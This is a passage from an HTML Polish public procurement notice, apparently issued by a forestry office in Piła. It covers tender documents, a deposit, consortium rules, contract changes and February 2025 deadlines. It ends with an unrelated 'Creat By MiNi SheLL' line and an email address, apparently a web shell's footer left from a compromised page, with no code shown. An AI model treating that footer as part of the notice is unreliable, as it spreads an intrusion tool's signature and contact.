usług,<br/>wykonywanych wspólnie z innymi Wykonawcami wykaz, o którym mowa wyżej<br/>dotyczy usług, w których wykonaniu Wykonawca ten bezpośrednio<br/>uczestniczył, a w przypadku świadczeń powtarzających się lub ciągłych, w<br/>których wykonywaniu bezpośrednio uczestniczył lub uczestniczy.<br/>b) dowodów określających, czy wskazane przez Wykonawcę w wykazie usługi na<br/>potwierdzenie spełnienia warunku udziału w postępowaniu dot. zdolności<br/>technicznej lub zawodowej w zakresie doświadczenia zostały wykonane lub są<br/>wykonywane należycie,<br/>Dowodami, o których mowa powyżej są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w<br/>przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli<br/>Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych<br/>dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń<br/>powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne<br/>dokumenty potwierdzające ich należyte wykonywanie powinny być<br/>wystawione w okresie ostatnich 3 miesięcy (wstecz od dnia, w którym upływa<br/>termin składania ofert).<br/>c) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia<br/>publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, posiadanych uprawnień<br/>(jeżeli są wymagane), niezbędnych do wykonania zamówienia publicznego, a<br/>także zakresu wykonywanych przez nie czynności oraz informacją o podstawie<br/>do dysponowania tymi osobami (wzór wykazu osób skierowanych przez<br/>Wykonawcę do realizacji zamówienia stanowi Załącznik nr 11 do SWZ),<br/>d) wykaz urządzeń technicznych dostępnych Wykonawcy w celu wykonania<br/>zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi<br/>zasobami - (wzór wykazu urządzeń technicznych dostępnych Wykonawcy w<br/>celu wykonania zamówienia stanowi Załącznik nr 12 do SWZ).</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium w wysokości: 9 450,00 zł <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>(konsorcjum):<br/>1) w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia;<br/>2) oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Osoba<br/>podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji.<br/>Umocowanie musi wynikać z treści pełnomocnictwa załączonego do oferty –<br/>treść pełnomocnictwa powinna dokładnie określać zakres umocowania;<br/>3) oświadczenie, o którym mowa w art. 125 ust. 1 PZP (tj. oświadczenie o<br/>spełnieniu warunków udziału w postępowaniu (wg wzoru stanowiącego<br/>załącznik nr 3 do SWZ) oraz o braku podstaw do wykluczenia (wg wzoru<br/>stanowiącego załącznik nr 2 do SWZ) składa każdy z wykonawców wspólnie<br/>ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw<br/>wykluczenia oraz spełnienie warunków udziału w postępowaniu w zakresie, w<br/>jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu. Ww. oświadczenie wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia powinno zostać złożone wraz z ofertą pod rygorem<br/>nieważności, w formie elektronicznej (tj. opatrzonej kwalifikowanym podpisem<br/>elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym<br/>lub podpisem osobistym;<br/>4) dokumenty, o których mowa w pkt 7.3. SWZ obowiązany będzie złożyć każdy z<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>5) dokumenty, o których mowa w pkt 7.2. lit. a) SWZ wykonawcy wspólnie<br/>ubiegający się o zamówienie składają wspólnie, dokumenty, o których mowa w<br/>pkt 7.2 lit. b) SWZ składa ten z wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia publicznego, który wykazuje spełnianie warunku<br/>udziału w postępowaniu, dla którego wykazania służy dany dokument;<br/>6) wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą<br/>ponosić odpowiedzialność solidarną za wykonanie umowy i wniesienie<br/>zabezpieczenia należytego wykonania umowy;<br/>7) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą<br/>spośród siebie Wykonawcę kierującego (lidera), upoważnionego do zaciągania<br/>zobowiązań, otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak<br/>też dla wszystkich partnerów;<br/>8) Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania<br/>umowy w całości przez lidera lub od wszystkich Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia łącznie lub każdego z osobna;<br/>9) Zamawiający informuje o treści przepisu art. 117 ust. 3 PZP, zgodnie z<br/>którym w odniesieniu do warunków dotyczących wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach<br/>tych z wykonawców, którzy wykonają usługi, do realizacji których te<br/>zdolności są wymagane.<br/>W związku z powyższym Wykonawca jest zobowiązany załączyć do oferty<br/>podmiotowy środek dowodowy w postaci oświadczenia, z którego wynika,<br/>które usługi wykonają poszczególni Wykonawcy. Wzór stosownego<br/>oświadczenia został zawarty w formularzu ofertowym (stanowiącym<br/>załącznik nr 1 do SWZ) i Zamawiający zaleca złożyć to oświadczenie<br/>właśnie w tym formularzu.<br/>10) W przypadku Wykonawców wykonujących działalność w formie spółki cywilnej<br/>postanowienia dot. oferty Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia (konsorcjum) stosuje się odpowiednio. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia określa załącznik nr 8 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-02-21 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zamowienia.pila.lasy.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-02-21 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-03-22</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com